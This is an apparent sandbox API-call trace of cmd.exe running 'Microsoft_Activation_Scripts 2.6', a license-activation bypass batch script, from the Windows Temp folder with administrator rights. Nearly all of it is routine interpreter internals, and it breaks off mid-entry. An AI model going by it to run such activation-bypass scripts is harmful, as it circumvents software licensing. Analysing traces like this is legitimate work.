[0175.646] _wcsicmp (_String1="color", _String2="VER") returned -19 [0175.646] _wcsicmp (_String1="color", _String2="VOL") returned -19 [0175.646] _wcsicmp (_String1="color", _String2="EXIT") returned -2 [0175.646] _wcsicmp (_String1="color", _String2="SETLOCAL") returned -16 [0175.646] _wcsicmp (_String1="color", _String2="ENDLOCAL") returned -2 [0175.646] _wcsicmp (_String1="color", _String2="TITLE") returned -17 [0175.646] _wcsicmp (_String1="color", _String2="START") returned -16 [0175.646] _wcsicmp (_String1="color", _String2="DPATH") returned -1 [0175.646] _wcsicmp (_String1="color", _String2="KEYS") returned -8 [0175.646] _wcsicmp (_String1="color", _String2="MOVE") returned -10 [0175.646] _wcsicmp (_String1="color", _String2="PUSHD") returned -13 [0175.646] _wcsicmp (_String1="color", _String2="POPD") returned -13 [0175.646] _wcsicmp (_String1="color", _String2="ASSOC") returned 2 [0175.646] _wcsicmp (_String1="color", _String2="FTYPE") returned -3 [0175.646] _wcsicmp (_String1="color", _String2="BREAK") returned 1 [0175.646] _wcsicmp (_String1="color", _String2="COLOR") returned 0 [0175.646] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.647] _wcsicmp (_String1="color", _String2="DIR") returned -1 [0175.647] _wcsicmp (_String1="color", _String2="ERASE") returned -2 [0175.647] _wcsicmp (_String1="color", _String2="DEL") returned -1 [0175.647] _wcsicmp (_String1="color", _String2="TYPE") returned -17 [0175.647] _wcsicmp (_String1="color", _String2="COPY") returned -4 [0175.647] _wcsicmp (_String1="color", _String2="CD") returned 11 [0175.647] _wcsicmp (_String1="color", _String2="CHDIR") returned 7 [0175.647] _wcsicmp (_String1="color", _String2="RENAME") returned -15 [0175.647] _wcsicmp (_String1="color", _String2="REN") returned -15 [0175.647] _wcsicmp (_String1="color", _String2="ECHO") returned -2 [0175.647] _wcsicmp (_String1="color", _String2="SET") returned -16 [0175.648] _wcsicmp (_String1="color", _String2="PAUSE") returned -13 [0175.648] _wcsicmp (_String1="color", _String2="DATE") returned -1 [0175.648] _wcsicmp (_String1="color", _String2="TIME") returned -17 [0175.648] _wcsicmp (_String1="color", _String2="PROMPT") returned -13 [0175.648] _wcsicmp (_String1="color", _String2="MD") returned -10 [0175.648] _wcsicmp (_String1="color", _String2="MKDIR") returned -10 [0175.648] _wcsicmp (_String1="color", _String2="RD") returned -15 [0175.648] _wcsicmp (_String1="color", _String2="RMDIR") returned -15 [0175.648] _wcsicmp (_String1="color", _String2="PATH") returned -13 [0175.648] _wcsicmp (_String1="color", _String2="GOTO") returned -4 [0175.648] _wcsicmp (_String1="color", _String2="SHIFT") returned -16 [0175.648] _wcsicmp (_String1="color", _String2="CLS") returned 3 [0175.648] _wcsicmp (_String1="color", _String2="CALL") returned 14 [0175.648] _wcsicmp (_String1="color", _String2="VERIFY") returned -19 [0175.648] _wcsicmp (_String1="color", _String2="VER") returned -19 [0175.648] _wcsicmp (_String1="color", _String2="VOL") returned -19 [0175.648] _wcsicmp (_String1="color", _String2="EXIT") returned -2 [0175.648] _wcsicmp (_String1="color", _String2="SETLOCAL") returned -16 [0175.648] _wcsicmp (_String1="color", _String2="ENDLOCAL") returned -2 [0175.648] _wcsicmp (_String1="color", _String2="TITLE") returned -17 [0175.648] _wcsicmp (_String1="color", _String2="START") returned -16 [0175.648] _wcsicmp (_String1="color", _String2="DPATH") returned -1 [0175.648] _wcsicmp (_String1="color", _String2="KEYS") returned -8 [0175.648] _wcsicmp (_String1="color", _String2="MOVE") returned -10 [0175.648] _wcsicmp (_String1="color", _String2="PUSHD") returned -13 [0175.648] _wcsicmp (_String1="color", _String2="POPD") returned -13 [0175.648] _wcsicmp (_String1="color", _String2="ASSOC") returned 2 [0175.648] _wcsicmp (_String1="color", _String2="FTYPE") returned -3 [0175.648] _wcsicmp (_String1="color", _String2="BREAK") returned 1 [0175.648] _wcsicmp (_String1="color", _String2="COLOR") returned 0 [0175.649] GetProcessHeap () returned 0x19a8f1e0000 [0175.649] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb9e0 [0175.649] GetProcessHeap () returned 0x19a8f1e0000 [0175.649] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb9e0, Size=0x18) returned 0x19a8f1ecb20 [0175.649] GetProcessHeap () returned 0x19a8f1e0000 [0175.649] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ecb20) returned 0x18 [0175.649] GetProcessHeap () returned 0x19a8f1e0000 [0175.649] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x24) returned 0x19a8f1eb6b0 [0175.649] _wcsnicmp (_String1="07", _String2="on", _MaxCount=0x2) returned -63 [0175.649] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0175.649] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x24, lpConsoleScreenBufferInfo=0x43f9efe9a8 | out: lpConsoleScreenBufferInfo=0x43f9efe9a8) returned 1 [0175.649] FillConsoleOutputAttribute (in: hConsoleOutput=0x24, wAttribute=0x7, nLength=0x107b38, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x43f9efe9a4 | out: lpNumberOfAttrsWritten=0x43f9efe9a4) returned 1 [0175.650] SetConsoleTextAttribute (hConsoleOutput=0x24, wAttributes=0x7) returned 1 [0175.651] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.651] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.651] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.651] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.651] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.651] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.652] SetConsoleInputExeNameW () returned 0x1 [0175.652] GetConsoleOutputCP () returned 0x1b5 [0175.652] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.652] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.653] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0175.653] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0175.653] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.653] SetFilePointer (in: hFile=0x94, lDistanceToMove=2900, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb54 [0175.653] GetProcessHeap () returned 0x19a8f1e0000 [0175.653] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0175.653] GetProcessHeap () returned 0x19a8f1e0000 [0175.654] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb20) returned 1 [0175.654] GetProcessHeap () returned 0x19a8f1e0000 [0175.654] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5950) returned 1 [0175.654] GetProcessHeap () returned 0x19a8f1e0000 [0175.654] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0175.654] GetProcessHeap () returned 0x19a8f1e0000 [0175.654] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0175.654] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.654] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb54 [0175.654] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.654] SetFilePointer (in: hFile=0x94, lDistanceToMove=2946, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb82 [0175.654] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="title Microsoft_Activation_Scripts %masver%\r\n", cbMultiByte=46, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="title Microsoft_Activation_Scripts %masver%\r\n============================================================================================\r\n") returned 46 [0175.655] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.655] GetFileType (hFile=0x94) returned 0x1 [0175.655] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.655] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb82 [0175.655] GetProcessHeap () returned 0x19a8f1e0000 [0175.655] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.655] GetProcessHeap () returned 0x19a8f1e0000 [0175.655] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f201d30 [0175.655] GetProcessHeap () returned 0x19a8f1e0000 [0175.655] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1eb8f0 [0175.655] GetEnvironmentVariableW (in: lpName="masver", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3 [0175.655] GetProcessHeap () returned 0x19a8f1e0000 [0175.655] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0175.655] GetProcessHeap () returned 0x19a8f1e0000 [0175.656] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201d30) returned 1 [0175.656] GetProcessHeap () returned 0x19a8f1e0000 [0175.656] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.656] _wcsicmp (_String1="title", _String2=")") returned 75 [0175.656] _wcsicmp (_String1="FOR", _String2="title") returned -14 [0175.656] _wcsicmp (_String1="FOR/?", _String2="title") returned -14 [0175.656] _wcsicmp (_String1="IF", _String2="title") returned -11 [0175.656] _wcsicmp (_String1="IF/?", _String2="title") returned -11 [0175.656] _wcsicmp (_String1="REM", _String2="title") returned -2 [0175.656] _wcsicmp (_String1="REM/?", _String2="title") returned -2 [0175.656] GetProcessHeap () returned 0x19a8f1e0000 [0175.656] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0175.656] GetProcessHeap () returned 0x19a8f1e0000 [0175.656] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb860 [0175.657] GetProcessHeap () returned 0x19a8f1e0000 [0175.657] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x56) returned 0x19a8f1f8c40 [0175.657] _tell (_FileHandle=3) returned 2946 [0175.657] _close (_FileHandle=3) returned 0 [0175.657] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0175.657] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0175.657] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0175.657] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0175.657] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0175.657] _wcsicmp (_String1="title", _String2="CD") returned 17 [0175.657] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0175.657] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0175.657] _wcsicmp (_String1="title", _String2="REN") returned 2 [0175.658] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0175.658] _wcsicmp (_String1="title", _String2="SET") returned 1 [0175.658] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0175.658] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0175.658] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0175.658] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0175.658] _wcsicmp (_String1="title", _String2="MD") returned 7 [0175.658] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0175.658] _wcsicmp (_String1="title", _String2="RD") returned 2 [0175.658] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0175.658] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0175.658] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0175.658] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0175.658] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0175.658] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0175.658] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0175.658] _wcsicmp (_String1="title", _String2="VER") returned -2 [0175.658] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0175.658] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0175.658] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0175.658] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0175.658] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0175.658] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.659] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0175.659] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0175.659] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0175.659] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0175.659] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0175.659] _wcsicmp (_String1="title", _String2="CD") returned 17 [0175.659] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0175.659] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0175.659] _wcsicmp (_String1="title", _String2="REN") returned 2 [0175.659] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0175.659] _wcsicmp (_String1="title", _String2="SET") returned 1 [0175.659] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0175.659] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0175.659] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0175.660] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0175.660] _wcsicmp (_String1="title", _String2="MD") returned 7 [0175.660] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0175.660] _wcsicmp (_String1="title", _String2="RD") returned 2 [0175.660] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0175.660] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0175.660] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0175.660] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0175.660] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0175.660] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0175.660] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0175.660] _wcsicmp (_String1="title", _String2="VER") returned -2 [0175.660] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0175.660] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0175.660] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0175.660] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0175.660] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0175.660] GetProcessHeap () returned 0x19a8f1e0000 [0175.660] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x9c) returned 0x19a8f1eaed0 [0175.660] GetProcessHeap () returned 0x19a8f1e0000 [0175.660] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eaed0, Size=0x54) returned 0x19a8f1eaed0 [0175.660] GetProcessHeap () returned 0x19a8f1e0000 [0175.660] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eaed0) returned 0x54 [0175.660] GetProcessHeap () returned 0x19a8f1e0000 [0175.660] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x62) returned 0x19a8f1eaf40 [0175.661] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x43f9efe7a8 | out: TokenHandle=0x43f9efe7a8*=0x0) returned 0xc000007c [0175.661] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x43f9efe7a8 | out: TokenHandle=0x43f9efe7a8*=0x94) returned 0x0 [0175.661] NtQueryInformationToken (in: TokenHandle=0x94, TokenInformationClass=0x12, TokenInformation=0x43f9efe758, TokenInformationLength=0x4, ReturnLength=0x43f9efe760 | out: TokenInformation=0x43f9efe758, ReturnLength=0x43f9efe760) returned 0x0 [0175.661] NtQueryInformationToken (in: TokenHandle=0x94, TokenInformationClass=0x1a, TokenInformation=0x43f9efe760, TokenInformationLength=0x4, ReturnLength=0x43f9efe758 | out: TokenInformation=0x43f9efe760, ReturnLength=0x43f9efe758) returned 0x0 [0175.661] NtClose (Handle=0x94) returned 0x0 [0175.661] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x43f9efe770, nSize=0x0, Arguments=0x43f9efe778 | out: lpBuffer="ꮰ輞ƚ") returned 0xf [0175.663] GetProcessHeap () returned 0x19a8f1e0000 [0175.663] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f1f9f80 [0175.663] SetConsoleTitleW (lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 1 [0175.666] GetProcessHeap () returned 0x19a8f1e0000 [0175.667] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9f80) returned 1 [0175.667] LocalFree (hMem=0x19a8f1eabb0) returned 0x0 [0175.667] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.667] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.667] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.667] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.667] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.667] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.668] SetConsoleInputExeNameW () returned 0x1 [0175.668] GetConsoleOutputCP () returned 0x1b5 [0175.668] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.668] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.669] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.669] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.669] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.669] SetFilePointer (in: hFile=0x90, lDistanceToMove=2946, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb82 [0175.669] GetProcessHeap () returned 0x19a8f1e0000 [0175.669] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaf40) returned 1 [0175.669] GetProcessHeap () returned 0x19a8f1e0000 [0175.670] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0175.670] GetProcessHeap () returned 0x19a8f1e0000 [0175.670] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8c40) returned 1 [0175.670] GetProcessHeap () returned 0x19a8f1e0000 [0175.670] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0175.670] GetProcessHeap () returned 0x19a8f1e0000 [0175.671] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0175.671] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.671] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb82 [0175.671] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.671] SetFilePointer (in: hFile=0x90, lDistanceToMove=2948, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb84 [0175.671] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\ntle Microsoft_Activation_Scripts %masver%\r\n============================================================================================\r\n") returned 2 [0175.671] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.671] GetFileType (hFile=0x90) returned 0x1 [0175.672] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.672] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb84 [0175.672] GetProcessHeap () returned 0x19a8f1e0000 [0175.672] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.672] GetProcessHeap () returned 0x19a8f1e0000 [0175.672] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.676] _tell (_FileHandle=3) returned 2948 [0175.676] _close (_FileHandle=3) returned 0 [0175.676] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.676] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.676] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.676] SetFilePointer (in: hFile=0x90, lDistanceToMove=2948, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb84 [0175.676] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.676] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb84 [0175.677] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.677] SetFilePointer (in: hFile=0x90, lDistanceToMove=2960, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb90 [0175.677] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _args=\r\n", cbMultiByte=12, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set _args=\r\nsoft_Activation_Scripts %masver%\r\n============================================================================================\r\n") returned 12 [0175.677] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.677] GetFileType (hFile=0x90) returned 0x1 [0175.677] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.677] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb90 [0175.677] GetProcessHeap () returned 0x19a8f1e0000 [0175.677] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.677] GetProcessHeap () returned 0x19a8f1e0000 [0175.679] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.679] _wcsicmp (_String1="set", _String2=")") returned 74 [0175.679] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0175.679] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0175.679] _wcsicmp (_String1="IF", _String2="set") returned -10 [0175.679] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0175.679] _wcsicmp (_String1="REM", _String2="set") returned -1 [0175.679] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0175.679] GetProcessHeap () returned 0x19a8f1e0000 [0175.679] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0175.679] GetProcessHeap () returned 0x19a8f1e0000 [0175.679] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec840 [0175.679] GetProcessHeap () returned 0x19a8f1e0000 [0175.679] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb9e0 [0175.679] _tell (_FileHandle=3) returned 2960 [0175.679] _close (_FileHandle=3) returned 0 [0175.680] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.680] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.680] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.680] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.680] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.680] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.680] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.680] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.680] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.680] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.680] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.680] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0175.680] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.681] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.681] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.681] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.681] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.681] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.681] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.681] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.681] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.681] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.681] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.681] GetProcessHeap () returned 0x19a8f1e0000 [0175.681] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0a70 [0175.681] GetProcessHeap () returned 0x19a8f1e0000 [0175.681] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0a70, Size=0x1e) returned 0x19a8f1eb6b0 [0175.681] GetProcessHeap () returned 0x19a8f1e0000 [0175.681] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb6b0) returned 0x1e [0175.681] wcsncmp (_String1="_arg", _String2="/", _MaxCount=0x4) returned 48 [0175.681] GetProcessHeap () returned 0x19a8f1e0000 [0175.681] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb920 [0175.681] _wcsnicmp (_String1="_a", _String2="/A", _MaxCount=0x2) returned 48 [0175.681] _wcsnicmp (_String1="_a", _String2="/P", _MaxCount=0x2) returned 48 [0175.681] SetEnvironmentVariableW (lpName="_args", lpValue=0x0) returned 1 [0175.681] GetProcessHeap () returned 0x19a8f1e0000 [0175.682] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eeb50) returned 1 [0175.682] GetEnvironmentStringsW () returned 0x19a8f1ece20* [0175.682] 